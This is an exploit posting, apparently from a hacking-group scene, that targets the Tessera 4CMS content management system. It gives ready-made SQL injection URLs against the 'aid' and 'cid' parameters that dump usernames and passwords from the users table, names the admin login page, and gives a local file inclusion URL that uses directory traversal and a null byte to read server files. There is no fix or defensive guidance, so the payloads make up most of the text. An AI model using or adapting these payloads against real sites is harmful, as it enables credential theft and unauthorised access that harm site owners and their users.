############################################################### # # # Tessera 4CMS multiple vulnerabilities (SQLi + LFI) # ############################################################### # ####### # # # # xploited by k1ll3r_null # # # # contact: k1ll3r.null@gmail.com # ############################################################### +++++++ greetz to all p0wnbox.com members !!! +++++++ -------------------------------------------------------------------------------------- Vulnerable product : tessera 4CMS (all versions) Read Product info : http://www.tessera.gr/frontend/article.php?aid=9&cid=5 ------------------------------------------------------------------------------------------------------------------------- SQL injection vulnerabilities : vulnerable file : article.php // vulnerable parameter: "aid" ($_GET) vulnerable file : articles.php // vulnerable parameter: "cid" ($_GET) Exploit : 1) http://www.site.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- 2) http://www.site.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- LOGIN: http://site.com/admin/login.php ------------------------------------------------------------------------------------------------------------------------- LFI vulnerability : vulnerable file : index.php // vulnerable parameter: "chlang" ($_GET) Exploit : http://www.site.com/frontend/index.php?chlang=../../../../etc/services%00 --------------------------------------------------------------------------------------------------------------------------